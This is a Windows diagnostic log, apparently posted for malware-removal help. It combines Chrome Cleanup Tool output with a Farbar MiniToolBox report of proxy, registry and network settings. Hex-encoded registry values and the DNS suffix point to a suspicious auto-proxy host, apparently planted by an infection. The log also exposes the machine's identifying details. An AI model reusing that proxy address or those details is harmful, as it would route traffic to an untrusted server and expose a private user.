[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Opera Mobile
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Origin
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Pidgin
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\PremiumSoft
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\QuickTime
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\RaidCall
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Reference Assemblies
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Roxio
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Safari
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Skype
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Sophos
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Steam
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\STMicroelectronics
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\TeamSpeak 3 Client
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\TeamViewer
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Trend Micro
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Tweaking.com
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Uninstall Information
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Ventrilo
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\VMware
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Defender
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Live
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Mail
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Media Player
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows NT
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Photo Viewer
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Portable Devices
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Sidebar
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Windows Virtual PC
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\.purple
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Adobe
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Apple Computer
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Battle.net
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\BitTorrent
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Creative
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\DAEMON Tools Lite
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\dlg
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Dropbox
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\enchant
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\FileZilla
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Identities
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\IDM
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Intel
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Juniper Networks
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Macromedia
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Media Center Programs
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Microsoft
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Mozilla
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Notepad++
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\ooVoo Details
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\OpenOffice.org
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Origin
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Pegasus Mail
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\PowerISO
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\raidcall
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Roxio
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Roxio Burn
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Skype
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\SoftGrid Client
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\StageManager.BD092818F67280F4B42B04877600987F0111B594.1
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\TeamViewer
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\The Creative Assembly
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Thunderbird
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\TS3Client
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\Ventrilo
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\VMware
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\webex
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Roaming\WinRAR
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Adobe
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Apple
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Apple Computer
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Application Data
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Apps
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Battle.net
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Blizzard
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Blizzard Entertainment
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Broadcom
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Chromium
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Citrix
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\CrashDumps
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Deployment
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Diagnostics
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\ElevatedDiagnostics
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\EmieBrowserModeList
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\EmieSiteList
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\EmieUserList
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Glyph
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Google
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\History
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\join.me
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Juniper Networks
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Macromedia
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Microsoft
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Microsoft_Corporation
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Mozilla
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\My Games
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\openvr
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Opera
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Origin
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Programs
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Skype
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\SoftGrid Client
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Steam
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Temp
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Temporary Internet Files
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\Thunderbird
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\VirtualStore
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\VMware
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Users\dell 2\AppData\Local\WinZip
[0606/002705:INFO:system_report_component.cc(509)] LSP: {9D60A9E0-337A-11D0-BD88-0000C082E69A} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(509)] LSP: {9FC48064-7298-43E4-B7BD-181F2089792A} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(509)] LSP: {E70F1AA0-AB8B-11CF-8CA3-00805F48A192} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(509)] LSP: {F9EAB0C0-26D4-11D0-BBBF-00AA006C34E4} = '%SystemRoot%\system32\mswsock.dll'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ProxyEnable' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SyncMode5' = '00000004'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SpecialFoldersCacheSize' = '00000008'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SecurityIdIUriCacheSize' = '0000001e'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\CoInternetCombineIUriCacheSize' = '00000050'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\CreateUriCacheSize' = '00000050'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ShowPunycode' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnablePunycode' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableSSL3Fallback' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\BackgroundConnections' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableSPDY3_0' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ProxyHttp1.1' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\NoNetAutodial' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableAutodial' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\GlobalUserOffline' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\MigrateProxy' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableNegotiate' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\CertificateRevocation' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\WarnonZoneCrossing' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\DisableCachingOfSSLPages' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\ZonesSecurityUpgrade' = '6E22C957E1EACE01'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\PrivacyAdvanced' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\SecureProtocols' = '00000a80'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\UrlEncoding' = '00000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\WarnOnPost' = '01000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\UseSchannelDirectly' = '01000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\AutoConfigProxy' = 'wininet.dll'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\MimeExclusionListForCache' = 'multipart/mixed multipart/x-mixed-replace multipart/x-byteranges '.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\WarnOnIntranet' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EnableHttp1_1' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\PrivDiscUiShown' = '00000001'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\EmailName' = 'IEUser@'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\User Agent' = 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\IE5_UA_Backup_Flag' = '5.0'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\SavedLegacySettings' = '46000000A600000001000000000000000000000000000000010000002A000000687474703A2F2F777061642E62726F77736572757064617465636865636B2E696E2F777061642E64617400000000000000000000000000000000000000000300000002000000C0A84B0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A85D0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A80104000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\DefaultConnectionSettings' = '460000004C00000001000000000000000000000000000000010000002A000000687474703A2F2F777061642E62726F77736572757064617465636865636B2E696E2F777061642E64617400000000000000000000000000000000000000000300000002000000C0A84B0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A85D0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A80104000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\' = '09'.
[0606/002705:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\internet settings\connections\Redcloud' = '460000000700000009000000000000000B0000003C2D6C6F6F706261636B3E000000000000000000000000000000000000000000000000000000000000000000000000'.
[0606/002705:INFO:system_report_component.cc(621)] WinINET Proxy settings: config='' bypass='' autoconfig='' .
[0606/002705:INFO:system_report_component.cc(658)] WinHTTP Proxy settings: no proxy config='' bypass=''.
[0606/002705:WARNING:system_report_component.cc(515)] ReportSecurityInformation.
[0606/002705:INFO:system_report_component.cc(580)] Antivirus: Microsoft Security Essentials
[0606/002705:ERROR:task_scheduler.cc(1062)] RegisterTaskDefinition failed. 80041315: The operation completed successfully. (0x0)
[0606/002705:ERROR:pending_logs_service.cc(87)] Failed to register logs upload retry task.
[0606/002705:INFO:safe_browsing_reporter.cc(129)] OnURLFetchUploadProgress(39136/39136).
[0606/002705:INFO:safe_browsing_reporter.cc(212)] Calling done_callback_ with result: 0
[0606/002705:ERROR:restart_manager_wrapper.cc(94)] kRmEndSession failed.: The operation completed successfully. (0x0)
[0606/002705:INFO:chrome_cleaner_main.cc(360)] Exiting with code: 2
[0606/002705:WARNING:logging_service.cc(111)] At least the last 6 log lines have not been uploaded to Safe Browsing.
 
========= End of CMD: =========
 
 
=========  type "C:\Users\dell 2\Desktop\Result.txt" =========
 
MiniToolBox by Farbar  Version: 11-05-2015 01
Ran by dell 2 (administrator) on 05-06-2015 at 23:30:12
Running from "C:\Users\dell 2\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2VZ4Y9Y8"
Microsoft Windows 7 Professional  Service Pack 1 (X64)
Model: Latitude E5520 Manufacturer: Dell Inc.
Boot Mode: Normal
***************************************************************************
 
========================= Flush DNS: ===================================
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========================= IE Proxy Settings: ============================== 
 
Proxy is not enabled.
No Proxy Server is set.
 
"Reset IE Proxy Settings": IE Proxy Settings were reset.
 
========================= FF Proxy Settings: ============================== 
 
 
"Reset FF Proxy Settings": Firefox Proxy settings were reset.
 
========================= Hosts content: =================================
 
 
 
========================= IP Configuration: ================================
 
Intel® Centrino® Ultimate-N 6300 AGN = Wireless Network Connection (Connected)
VMware Virtual Ethernet Adapter for VMnet1 = VMware Network Adapter VMnet1 (Connected)
VMware Virtual Ethernet Adapter for VMnet8 = VMware Network Adapter VMnet8 (Connected)
Broadcom NetXtreme 57xx Gigabit Controller = Local Area Connection (Media disconnected)
Microsoft Virtual WiFi Miniport Adapter = Wireless Network Connection 2 (Media disconnected)
 
 
# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4
 
reset
set global icmpredirects=enabled
add address name="VMware Network Adapter VMnet1" address=192.168.75.1 mask=255.255.255.0
add address name="VMware Network Adapter VMnet8" address=192.168.93.1 mask=255.255.255.0
 
 
popd
# End of IPv4 configuration
 
 
 
Windows IP Configuration
 
   Host Name . . . . . . . . . . . . : Seville
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : browserupdatecheck.in
 
Ethernet adapter Local Area Connection* 13:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Juniper Network Connect Virtual Adapter
   Physical Address. . . . . . . . . : 00-FF-B0-9B-4D-04
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Wireless Network Connection 2:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft Virtual WiFi Miniport Adapter
   Physical Address. . . . . . . . . : 00-24-D7-C9-88-11
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Wireless Network Connection:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel® Centrino® Ultimate-N 6300 AGN
   Physical Address. . . . . . . . . : 00-24-D7-C9-88-10
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::5dc4:d591:1fbf:3eb0%14(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.1.4(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 2015?6?5? 21:57:59
   Lease Expires . . . . . . . . . . : 2015?6?6? 21:57:58
   Default Gateway . . . . . . . . . : 192.168.1.1
   DHCP Server . . . . . . . . . . . : 192.168.1.1
   DHCPv6 IAID . . . . . . . . . . . : 184558807
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-8A-76-2F-D0-67-E5-2D-DA-85
   DNS Servers . . . . . . . . . . . : 192.168.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Ethernet adapter Local Area Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : hsd1.mi.comcast.net.
   Description . . . . . . . . . . . : Broadcom NetXtreme 57xx Gigabit Controller
   Physical Address. . . . . . . . . : D0-67-E5-2D-DA-85
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Ethernet adapter VMware Network Adapter VMnet1:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet1
   Physical Address. . . . . . . . . : 00-50-56-C0-00-01
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e9:ff48:ac8b:d8e1%17(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.75.1(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 704663638
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-8A-76-2F-D0-67-E5-2D-DA-85
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Ethernet adapter VMware Network Adapter VMnet8:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet8
   Physical Address. . . . . . . . . : 00-50-56-C0-00-08
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e0ba:c7ad:6de2:85ae%18(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.93.1(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 721440854
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-8A-76-2F-D0-67-E5-2D-DA-85
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled
Server:  UnKnown
Address:  192.168.1.1
 
Name:    google.com
Addresses:  2607:f8b0:4009:80a::200e
 216.58.216.238
 
 
Pinging google.com [216.58.216.206] with 32 bytes of data:
Reply from 216.58.216.206: bytes=32 time=24ms TTL=54
Reply from 216.58.216.206: bytes=32 time=23ms TTL=54
 
Ping statistics for 216.58.216.206:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 23ms, Maximum = 24ms, Average = 23ms
Server:  UnKnown
Address:  192.168.1.1
 
Name:    yahoo.com
Addresses:  98.139.183.24
 98.138.253.109
 206.190.36.45
 
 
Pinging yahoo.com [98.138.253.109] with 32 bytes of data:
Reply from 98.138.253.109: bytes=32 time=48ms TTL=50
Reply from 98.138.253.109: bytes=32 time=48ms TTL=50
 
Ping statistics for 98.138.253.109:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 48ms, Maximum = 48ms, Average = 48ms
 
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
 
Ping statistics for 127.0.0.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
 21...00 ff b0 9b 4d 04 ......Juniper Network Connect Virtual Adapter
 16...00 24 d7 c9 88 11 ......Microsoft Virtual WiFi Miniport Adapter
 14...00 24 d7 c9 88 10 ......Intel® Centrino® Ultimate-N 6300 AGN
 11...d0 67 e5 2d da 85 ......Broadcom NetXtreme 57xx Gigabit Controller
 17...00 50 56 c0 00 01 ......VMware Virtual Ethernet Adapter for VMnet1
 18...00 50 56 c0 00 08 ......VMware Virtual Ethernet Adapter for VMnet8
  1...........................Software Loopback Interface 1
===========================================================================
 
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1      192.168.1.4     25
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
      192.168.1.0    255.255.255.0         On-link       192.168.1.4    281
      192.168.1.4  255.255.255.255         On-link       192.168.1.4    281
    192.168.1.255  255.255.255.255         On-link       192.168.1.4    281
     192.168.75.0    255.255.255.0         On-link      192.168.75.1    276
     192.168.75.1  255.255.255.255         On-link      192.168.75.1    276
   192.168.75.255  255.255.255.255         On-link      192.168.75.1    276
     192.168.93.0    255.255.255.0         On-link      192.168.93.1    276
     192.168.93.1  255.255.255.255         On-link      192.168.93.1    276
   192.168.93.255  255.255.255.255         On-link      192.168.93.1    276
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link      192.168.75.1    276
        224.0.0.0        240.0.0.0         On-link      192.168.93.1    276
        224.0.0.0        240.0.0.0         On-link       192.168.1.4    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link      192.168.75.1    276
  255.255.255.255  255.255.255.255         On-link      192.168.93.1    276
  255.255.255.255  255.255.255.255         On-link       192.168.1.4    281
===========================================================================
Persistent Routes:
  None
 
IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
 17    276 fe80::/64                On-link
 18    276 fe80::/64                On-link
 14    281 fe80::/64                On-link
 17    276 fe80::e9:ff48:ac8b:d8e1/128
                                    On-link
 14    281 fe80::5dc4:d591:1fbf:3eb0/128
                                    On-link
 18    276 fe80::e0ba:c7ad:6de2:85ae/128
                                    On-link
  1    306 ff00::/8                 On-link
 17    276 ff00::/8                 On-link
 18    276 ff00::/8                 On-link
 14    281 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None
========================= Winsock entries =====================================
 
Catalog5 01 C:\Windows\SysWOW64\NLAapi.dll [52224] (Microsoft Corporation)
Catalog5 02 C:\Windows\SysWOW64\napinsp.dll [52224] (Microsoft Corporation)
